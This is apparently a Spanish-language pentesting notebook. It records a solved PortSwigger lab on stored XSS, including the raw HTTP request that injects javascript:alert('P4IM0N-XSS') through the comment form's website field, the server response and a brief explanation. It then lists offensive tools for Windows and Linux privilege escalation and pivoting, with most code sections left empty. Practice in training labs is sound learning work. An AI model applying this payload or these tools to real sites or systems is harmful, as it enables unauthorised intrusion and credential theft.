                            <h2>Stored XSS into anchor <code>href</code> attribute with double quotes HTML-encoded</h2>
                            <a class=link-back href='https://portswigger.net/web-security/cross-site-scripting/contexts/lab-href-attribute-double-quotes-html-encoded'>
                                Back&nbsp;to&nbsp;lab&nbsp;description&nbsp;
                                <svg version=1.1 id=Layer_1 xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' x=0px y=0px viewBox='0 0 28 30' enable-background='new 0 0 28 30' xml:space=preserve title=back-arrow>
                                    <g>
                                        <polygon points='1.4,0 0,1.2 12.6,15 0,28.8 1.4,30 15.1,15'></polygon>
                                        <polygon points='14.3,0 12.9,1.2 25.6,15 12.9,28.8 14.3,30 28,15'></polygon>
                                    </g>
                                </svg>
                            </a>
                        </div>
                        <div class='widgetcontainer-lab-status is-solved'>
                            <span>LAB</span>
                            <p>Solved</p>
                            <span class=lab-status-icon></span>
                        </div>
                    </div>
                </div>
            </section>
            <section id=notification-labsolved class=notification-labsolved>
                <div class=container>
                    <h4>Congratulations, you solved the lab!</h4>
                    <div>
                        <span>
                            Share your skills!
                        </span>
                        <a class=button href='https://twitter.com/intent/tweet?text=I+completed+the+Web+Security+Academy+lab%3a%0aStored+XSS+into+anchor+href+attribute+with+double+quotes+HTML-encoded%0a%0a@WebSecAcademy%0a&url=https%3a%2f%2fportswigger.net%2fweb-security%2fcross-site-scripting%2fcontexts%2flab-href-attribute-double-quotes-html-encoded&related=WebSecAcademy,Burp_Suite'>
                    <svg xmlns='http://www.w3.org/2000/svg' width=24 height=24 viewBox='0 0 20.44 17.72'>
                        <title>twitter-button</title>
                        <path d='M0,15.85c11.51,5.52,18.51-2,18.71-12.24.3-.24,1.73-1.24,1.73-1.24H18.68l1.43-2-2.74,1a4.09,4.09,0,0,0-5-.84c-3.13,1.44-2.13,4.94-2.13,4.94S6.38,6.21,1.76,1c-1.39,1.56,0,5.39.67,5.73C2.18,7,.66,6.4.66,5.9-.07,9.36,3.14,10.54,4,10.72a2.39,2.39,0,0,1-2.18.08c-.09,1.1,2.94,3.33,4.11,3.27A10.18,10.18,0,0,1,0,15.85Z'></path>
                    </svg>
                        </a>
                        <a class=button href='https://www.linkedin.com/sharing/share-offsite?url=https%3a%2f%2fportswigger.net%2fweb-security%2fcross-site-scripting%2fcontexts%2flab-href-attribute-double-quotes-html-encoded'>
                    <svg viewBox='0 0 64 64' width='24' xml:space='preserve' xmlns='http://www.w3.org/2000/svg'
                        <title>linkedin-button</title>
                        <path d='M2,6v52c0,2.2,1.8,4,4,4h52c2.2,0,4-1.8,4-4V6c0-2.2-1.8-4-4-4H6C3.8,2,2,3.8,2,6z M19.1,52H12V24.4h7.1V52z    M15.6,18.9c-2,0-3.6-1.5-3.6-3.4c0-1.9,1.6-3.4,3.6-3.4c2,0,3.6,1.5,3.6,3.4C19.1,17.4,17.5,18.9,15.6,18.9z M52,52h-7.1V38.2   c0-2.9-0.1-4.8-0.4-5.7c-0.3-0.9-0.8-1.5-1.4-2c-0.7-0.5-1.5-0.7-2.4-0.7c-1.2,0-2.3,0.3-3.2,1c-1,0.7-1.6,1.6-2,2.7   c-0.4,1.1-0.5,3.2-0.5,6.2V52h-8.6V24.4h7.1v4.1c2.4-3.1,5.5-4.7,9.2-4.7c1.6,0,3.1,0.3,4.5,0.9c1.3,0.6,2.4,1.3,3.1,2.2   c0.7,0.9,1.2,1.9,1.4,3.1c0.3,1.1,0.4,2.8,0.4,4.9V52z'/>
                    </svg>
                        </a>
                        <a href='https://portswigger.net/web-security/cross-site-scripting/contexts/lab-href-attribute-double-quotes-html-encoded'>
                            Continue learning 
                            <svg version=1.1 id=Layer_1 xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' x=0px y=0px viewBox='0 0 28 30' enable-background='new 0 0 28 30' xml:space=preserve title=back-arrow>
                                <g>
                                    <polygon points='1.4,0 0,1.2 12.6,15 0,28.8 1.4,30 15.1,15'></polygon>
                                    <polygon points='14.3,0 12.9,1.2 25.6,15 12.9,28.8 14.3,30 28,15'></polygon>
                                </g>
                            </svg>
                        </a>
                    </div>
                </div>
            </section>
        </div>
        <div theme="blog">
            <section class="maincontainer">
                <div class="container is-page">
                    <header class="navigation-header">
                        <section class="top-links">
                            <a href=/>Home</a><p>|</p>
                        </section>
                    </header>
                    <header class="notification-header">
                    </header>
                    <h1>Thank you for your comment!</h1>
                    <p>Your comment has been submitted.</p>
                    <div class="is-linkback">
                        <a href="/post?postId=6">Back to blog</a>
                    </div>
                </div>
            </section>
            <div class="footer-wrapper">
            </div>
        </div>
    </body>
</html>





-------------




REQQUEST CON EL PAYLOAD FUNCIONANDO (javascript:alert('P4IM0N-XSS')):


POST /post/comment HTTP/2
Host: 0a18009404d9f89a83c33ccd00040081.web-security-academy.net
Cookie: session=wIYdf7PqerZCFYTDC3gD2AoGbBXyuRp0
Content-Length: 154
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="118", "Google Chrome";v="118", "Not=A?Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: https://0a18009404d9f89a83c33ccd00040081.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://0a18009404d9f89a83c33ccd00040081.web-security-academy.net/post?postId=6
Accept-Encoding: gzip, deflate, br
Accept-Language: es-419,es;q=0.9,en;q=0.8

csrf=2UG950bIoDRrvtRmAELfwdnkH9DxybNV&postId=6&comment=TE+HACKIE+1&name=PAIMON&email=P4IM0N%40hotmail.com&website=javascript%3Aalert%28%27P4IM0N-XSS%27%29







RESPONSE CON EL PAYLOAD FUNCIONANDO (javascript:alert('P4IM0N-XSS')):



HTTP/2 200 OK
Content-Type: text/html; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 5924

<!DOCTYPE html>
<html>
    <head>
        <link href=/resources/labheader/css/academyLabHeader.css rel=stylesheet>
        <link href=/resources/css/labsBlog.css rel=stylesheet>
        <title>Stored XSS into anchor href attribute with double quotes HTML-encoded</title>
    </head>
    <body>
        <script src="/resources/labheader/js/labHeader.js"></script>
        <div id="academyLabHeader">
            <section class='academyLabBanner is-solved'>
                <div class=container>
                    <div class=logo></div>
                        <div class=title-container>
                            <h2>Stored XSS into anchor <code>href</code> attribute with double quotes HTML-encoded</h2>
                            <a class=link-back href='https://portswigger.net/web-security/cross-site-scripting/contexts/lab-href-attribute-double-quotes-html-encoded'>
                                Back&nbsp;to&nbsp;lab&nbsp;description&nbsp;
                                <svg version=1.1 id=Layer_1 xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' x=0px y=0px viewBox='0 0 28 30' enable-background='new 0 0 28 30' xml:space=preserve title=back-arrow>
                                    <g>
                                        <polygon points='1.4,0 0,1.2 12.6,15 0,28.8 1.4,30 15.1,15'></polygon>
                                        <polygon points='14.3,0 12.9,1.2 25.6,15 12.9,28.8 14.3,30 28,15'></polygon>
                                    </g>
                                </svg>
                            </a>
                        </div>
                        <div class='widgetcontainer-lab-status is-solved'>
                            <span>LAB</span>
                            <p>Solved</p>
                            <span class=lab-status-icon></span>
                        </div>
                    </div>
                </div>
            </section>
            <section id=notification-labsolved class=notification-labsolved>
                <div class=container>
                    <h4>Congratulations, you solved the lab!</h4>
                    <div>
                        <span>
                            Share your skills!
                        </span>
                        <a class=button href='https://twitter.com/intent/tweet?text=I+completed+the+Web+Security+Academy+lab%3a%0aStored+XSS+into+anchor+href+attribute+with+double+quotes+HTML-encoded%0a%0a@WebSecAcademy%0a&url=https%3a%2f%2fportswigger.net%2fweb-security%2fcross-site-scripting%2fcontexts%2flab-href-attribute-double-quotes-html-encoded&related=WebSecAcademy,Burp_Suite'>
                    <svg xmlns='http://www.w3.org/2000/svg' width=24 height=24 viewBox='0 0 20.44 17.72'>
                        <title>twitter-button</title>
                        <path d='M0,15.85c11.51,5.52,18.51-2,18.71-12.24.3-.24,1.73-1.24,1.73-1.24H18.68l1.43-2-2.74,1a4.09,4.09,0,0,0-5-.84c-3.13,1.44-2.13,4.94-2.13,4.94S6.38,6.21,1.76,1c-1.39,1.56,0,5.39.67,5.73C2.18,7,.66,6.4.66,5.9-.07,9.36,3.14,10.54,4,10.72a2.39,2.39,0,0,1-2.18.08c-.09,1.1,2.94,3.33,4.11,3.27A10.18,10.18,0,0,1,0,15.85Z'></path>
                    </svg>
                        </a>
                        <a class=button href='https://www.linkedin.com/sharing/share-offsite?url=https%3a%2f%2fportswigger.net%2fweb-security%2fcross-site-scripting%2fcontexts%2flab-href-attribute-double-quotes-html-encoded'>
                    <svg viewBox='0 0 64 64' width='24' xml:space='preserve' xmlns='http://www.w3.org/2000/svg'
                        <title>linkedin-button</title>
                        <path d='M2,6v52c0,2.2,1.8,4,4,4h52c2.2,0,4-1.8,4-4V6c0-2.2-1.8-4-4-4H6C3.8,2,2,3.8,2,6z M19.1,52H12V24.4h7.1V52z    M15.6,18.9c-2,0-3.6-1.5-3.6-3.4c0-1.9,1.6-3.4,3.6-3.4c2,0,3.6,1.5,3.6,3.4C19.1,17.4,17.5,18.9,15.6,18.9z M52,52h-7.1V38.2   c0-2.9-0.1-4.8-0.4-5.7c-0.3-0.9-0.8-1.5-1.4-2c-0.7-0.5-1.5-0.7-2.4-0.7c-1.2,0-2.3,0.3-3.2,1c-1,0.7-1.6,1.6-2,2.7   c-0.4,1.1-0.5,3.2-0.5,6.2V52h-8.6V24.4h7.1v4.1c2.4-3.1,5.5-4.7,9.2-4.7c1.6,0,3.1,0.3,4.5,0.9c1.3,0.6,2.4,1.3,3.1,2.2   c0.7,0.9,1.2,1.9,1.4,3.1c0.3,1.1,0.4,2.8,0.4,4.9V52z'/>
                    </svg>
                        </a>
                        <a href='https://portswigger.net/web-security/cross-site-scripting/contexts/lab-href-attribute-double-quotes-html-encoded'>
                            Continue learning 
                            <svg version=1.1 id=Layer_1 xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' x=0px y=0px viewBox='0 0 28 30' enable-background='new 0 0 28 30' xml:space=preserve title=back-arrow>
                                <g>
                                    <polygon points='1.4,0 0,1.2 12.6,15 0,28.8 1.4,30 15.1,15'></polygon>
                                    <polygon points='14.3,0 12.9,1.2 25.6,15 12.9,28.8 14.3,30 28,15'></polygon>
                                </g>
                            </svg>
                        </a>
                    </div>
                </div>
            </section>
        </div>
        <div theme="blog">
            <section class="maincontainer">
                <div class="container is-page">
                    <header class="navigation-header">
                        <section class="top-links">
                            <a href=/>Home</a><p>|</p>
                        </section>
                    </header>
                    <header class="notification-header">
                    </header>
                    <h1>Thank you for your comment!</h1>
                    <p>Your comment has been submitted.</p>
                    <div class="is-linkback">
                        <a href="/post?postId=6">Back to blog</a>
                    </div>
                </div>
            </section>
            <div class="footer-wrapper">
            </div>
        </div>
    </body>
</html>

CONCLUSION: CONSTATAMOS QUE EL HREF DEL NOMBRE DEL USUARIO QUE COMENTA ESTA DENTRO DE UINA ETIQUETA A , Y DENTRO DEL DICHO HREF SIMPLEMETE VEMOS QUE SE CARGABA EL PARAMETRO WEB SITE QUE INGRESABA EL SUSARIO Y VIMOS ESTA PUERTA DE ENTRADA PARA CARGAR NUESTRO PAYLOAD DIRECTAMENTE CON COMILLAS SIMPLES Y LOGARA LA INYECCION DEL XSS ALMACENADO SE TENZO.

⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔

💠 ESCALADA DE PRIVILEGIOS WINDOWS ❌

ESCALADA DE PRIVILEGIOS WINDOWS

NETCAT👈 --------------------------------->https://www.kali.org/tools/netcat/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
NETCAT👈 --------------------------------->https://www.kali.org/tools/netcat/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
NETCAT👈 --------------------------------->https://www.kali.org/tools/netcat/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
METASPLOIT👈 --------------------------------->https://www.metasploit.com/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
METASPLOIT👈 --------------------------------->https://www.metasploit.com/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
METASPLOIT👈 --------------------------------->https://www.metasploit.com/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SOCAT👈 --------------------------------->https://www.kali.org/tools/socat/--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SOCAT👈 --------------------------------->https://www.kali.org/tools/socat/--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SSH TUNNELS👈 --------------------------------->https://www.openssh.com/--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SSH TUNNELS👈 --------------------------------->https://www.openssh.com/--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
POWERUP👈 --------------------------------->https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerUp/PowerUp.ps1
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
LaZagne👈 --------------------------------->https://github.com/AlessandroZ/LaZagne--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
MIMIKATZ👈 --------------------------------->https://www.kali.org/tools/mimikatz/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
ROTTENPOTATO👈 --------------------------------->https://github.com/breenmachine/RottenPotatoNG
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
WINDOWS EXPLOITS SUGGESTER👈 --------------------------------->https://github.com/AonCyberLabs/Windows-Exploit-Suggester
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
ACCESSCHK👈 --------------------------------->https://github.com/ankh2054/windows-pentest
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
PSEXEC👈 --------------------------------->https://learn.microsoft.com/en-us/sysinternals/downloads/psexec
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
WINPEAS👈 --------------------------------->https://www.kali.org/tools/peass-ng/ --->https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
BLOODHOUND --------------------------------->https://github.com/BloodHoundAD/BloodHound
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
CRACKMAPEXEC --------------------------------->https://www.kali.org/tools/crackmapexec/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
EMPIRE POWERSHELL Y LINUX👈 --------------------------------->https://www.kali.org/tools/powershell-empire/ -->https://github.com/EmpireProject/Empire
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
RESPONDER👈 --------------------------------->https://www.kali.org/tools/responder/ -->https://github.com/SpiderLabs/Responder
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
LOLBAS👈 --------------------------------->https://lolbas-project.github.io/#
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
WADCOMS comandos👈 --------------------------------->https://wadcoms.github.io/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
HIJACKLIBS DLL👈 --------------------------------->https://hijacklibs.net/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
PRINTSPOOFER👈 --------------------------------->https://github.com/itm4n/PrintSpoofer
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
ROGUEWINRM👈 --------------------------------->https://github.com/antonioCoco/RogueWinRM
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
WINDOWSPRIVESC metodos👈 --------------------------------->https://github.com/debiantano/WindowsPrivesc
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
PRIV-ESCALATION metodos👈 --------------------------------->https://github.com/KevinLiebergen/priv-escalation
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
FILESEC GTFO win y linux👈 --------------------------------->https://filesec.io/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
HACKTRICKS👈 --------------------------------->https://book.hacktricks.xyz/v/es/welcome/readme
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
POWERSPLOIT👈 --------------------------------->https://www.kali.org/tools/powersploit/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
EVIL-WINRM👈 --------------------------------->https://www.kali.org/tools/evil-winrm/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMPLETAR...👈 --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMPLETAR...👈 --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:

☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️

🐧 ESCALADA DE PRIVILEGIOS LINUX ❌

ESCALADA DE PRIVILEGIOS LINUX

NETCAT👈 --------------------------------->https://www.kali.org/tools/netcat/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
NETCAT👈 --------------------------------->https://www.kali.org/tools/netcat/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
NETCAT👈 --------------------------------->https://www.kali.org/tools/netcat/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
METASPLOIT👈 --------------------------------->https://www.metasploit.com/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
METASPLOIT👈 --------------------------------->https://www.metasploit.com/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
METASPLOIT👈 --------------------------------->https://www.metasploit.com/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SOCAT👈 --------------------------------->https://www.kali.org/tools/socat/--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SOCAT👈 --------------------------------->https://www.kali.org/tools/socat/--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SSH TUNNELS👈 --------------------------------->https://www.openssh.com/--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SSH TUNNELS👈 --------------------------------->https://www.openssh.com/--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
LaZagne👈 --------------------------------->https://github.com/AlessandroZ/LaZagne--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
GTFObins👈 --------------------------------->https://gtfobins.github.io/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
GTFObins👈 --------------------------------->https://gtfobins.github.io/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
GTFObins👈 --------------------------------->https://gtfobins.github.io/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
LINUX KERNEL CVEs👈 --------------------------------->https://www.linuxkernelcves.com/cves
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
LINENUM👈 --------------------------------->https://github.com/rebootuser/LinEnum
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
LINPEAS👈 --------------------------------->https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
ENUMERACION SMART LINUX👈 --------------------------------->https://github.com/diego-treitos/linux-smart-enumeration
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
LINUXPRIVCHECKER👈 --------------------------------->https://github.com/sleventyeleven/linuxprivchecker
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
LINUX EXPLOIT SUGGESTER👈 --------------------------------->https://github.com/The-Z-Labs/linux-exploit-suggester
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
HACKTRICKS👈 --------------------------------->https://book.hacktricks.xyz/v/es/welcome/readme
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
CHKROOTKIT👈 --------------------------------->https://github.com/Magentron/chkrootkit
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
LYNIS👈 --------------------------------->https://github.com/CISOfy/lynis
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
UNIX-PRIVESC-CHECK👈 --------------------------------->https://github.com/pentestmonkey/unix-privesc-check
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
DIRDTYCOW👈 --------------------------------->https://github.com/firefart/dirtycow
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
PRIV-ESCALATION metodos👈 --------------------------------->https://github.com/KevinLiebergen/priv-escalation
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
FILESEC GTFO win y linux👈 --------------------------------->https://filesec.io/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
RESPONDER👈 --------------------------------->https://www.kali.org/tools/responder/ -->https://github.com/SpiderLabs/Responder
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMPLETAR...👈 --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMPLETAR...👈 --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:

☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️

♻️ PIVOTING ❌

PIVOTING

SSH TUNNELS👈 --------------------------------->https://www.openssh.com/--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
PROXYCHAINS👈 --------------------------------->https://github.com/rofl0r/proxychains-ng
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SOCAT👈 --------------------------------->https://www.kali.org/tools/socat/--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
NCAT👈 --------------------------------->https://nmap.org/ncat/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
CHISEL👈 --------------------------------->https://github.com/jpillora/chisel--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
CORKSCREW👈 --------------------------------->https://github.com/bryanpkc/corkscrew
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
METASPLOIT👈 --------------------------------->https://github.com/rapid7/metasploit-framework
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
METERPRETER👈 --------------------------------->https://www.metasploit.com/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
REGEORG👈 --------------------------------->https://github.com/sensepost/reGeorg
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
RPIVOT👈 --------------------------------->https://github.com/klsecservices/rpivot
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMPLETAR...👈 --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMPLETAR...👈 --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:

💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀

Last updated 1 year ago